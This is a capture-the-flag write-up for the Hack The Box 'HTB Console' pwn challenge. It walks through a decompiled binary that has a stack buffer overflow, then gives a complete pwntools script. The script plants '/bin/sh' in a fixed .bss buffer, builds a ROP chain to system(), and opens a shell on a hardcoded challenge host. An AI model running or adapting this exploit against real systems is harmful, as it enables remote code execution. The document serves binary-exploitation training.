HTB Console


Intro to Binary Exploitation htb-pwn


$ file htb-console 
htb-console: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=575e4055094a7f059c67032dd049e4fdbb171266, for GNU/Linux 3.2.0, stripped

$ checksec --file=htb-console 
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH  Symbols     FORTIFY Fortified   Fortifiable FILE
Partial RELRO   No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   No Symbols    No    0       3       htb-console
// Decompiled (IDA) command dispatcher of htb-console. a1 is a full input line,
// newline included — every comparison keys on "cmd\n". Two handlers read more
// input; the notes on the fgets() calls explain why one of them is the bug.
int __fastcall sub_401201(const char *a1)
{
  int result; // eax
  char s; // [rsp+10h] [rbp-10h]  -- stack slot 16 bytes below the saved rbp

  if ( !strcmp(a1, "id\n") )
    return puts("guest(1337) guest(1337) HTB(31337)");
  if ( !strcmp(a1, "dir\n") )
    return puts("/home/HTB");
  if ( !strcmp(a1, "flag\n") )
  {
    printf("Enter flag: ");
    // BUG: up to 47 bytes are written into a slot that sits only 0x10 below rbp.
    // checksec (above) shows no stack canary, so input longer than 16 bytes runs
    // into the saved rbp and then the return address. The fix is a properly
    // sized array with a matching bound: `char s[16]; fgets(s, sizeof s, stdin);`
    fgets(&s, 48, stdin);
    result = puts("Whoops, wrong flag!");
  }
  else if ( !strcmp(a1, "hof\n") )
  {
    puts("Register yourself for HTB Hall of Fame!");
    printf("Enter your name: ");
    // Correctly bounded (9 chars + NUL), but the destination is a global in
    // .bss; with no PIE its address is fixed, so user-chosen bytes end up at a
    // known address and persist after the call returns.
    fgets(byte_4040B0, 10, stdin);
    result = puts("See you on HoF soon! :)");
  }
  else if ( !strcmp(a1, "ls\n") )
  {
    puts("- Boxes");
    puts("- Challenges");
    puts("- Endgames");
    puts("- Fortress");
    result = puts("- Battlegrounds");
  }
  else if ( !strcmp(a1, "date\n") )
  {
    // "date" is resolved through PATH at run time, and merely importing
    // system() gives the binary a ready-made shell primitive (system@plt).
    result = system("date");
  }
  else
  {
    result = puts("Unrecognized command.");
  }
  return result;
}

From the code above we can extract some useful information:

"flag"
    fgets(&s, 48, stdin);
...
"hof"
    fgets(byte_4040B0, 10, stdin);
...
"date"
    result = system("date");

We need to know how system() is called:

...
lea     rdi, [...]    # address that stores parameter, .bss "/bin/sh"
call    system

You can learn more about ROP gadgets to follow the chain below.

from pwn import *

# Challenge endpoint as published; swap in the commented process() line to run
# against the local binary instead.
HOST = "159.65.92.13"
PORT = 31150

io = remote(HOST, PORT)
# io = process('./htb-console')

# All addresses are absolute: the binary has no PIE (see checksec above), so
# gadgets and the .bss buffer sit at the same address on every run. Either
# PIE or a stack canary alone would have broken this chain.
pop_rdi = 0x0401473     # pop rdi; ret
bss_hof = 0x004040b0    # .bss buffer filled by the "hof" handler (fgets, 10 bytes)

# 0x401381      call   0x401040 <system@plt>
system  = 0x401040 # can use 0x401381 or 0x401040

# Step 1: the "hof" handler is bounded but writes to a fixed global, so the
# string later handed to system() is placed at a known address.
# NOTE(review): recent pwntools versions expect bytes markers (b'>> ');
# str is still accepted and coerced.
io.recvuntil('>> ')
io.sendline('hof')
payload  = b'/bin/sh'
io.recvuntil('Enter your name: ')
io.sendline(payload)
# Step 2: the "flag" handler reads 48 bytes into a slot at rbp-0x10 with no
# canary, so 24 bytes (16 of buffer + 8 of saved rbp) reach the return address.
io.recvuntil('>> ')
io.sendline('flag')
payload  = b'a'*24          # padding up to the saved return address
payload += p64(pop_rdi)     # return into `pop rdi; ret`
payload += p64(bss_hof)     # rdi = address of the .bss string from step 1
payload += p64(system)      # then return into system@plt
io.recvuntil('Enter flag: ')
io.sendline(payload)
io.interactive()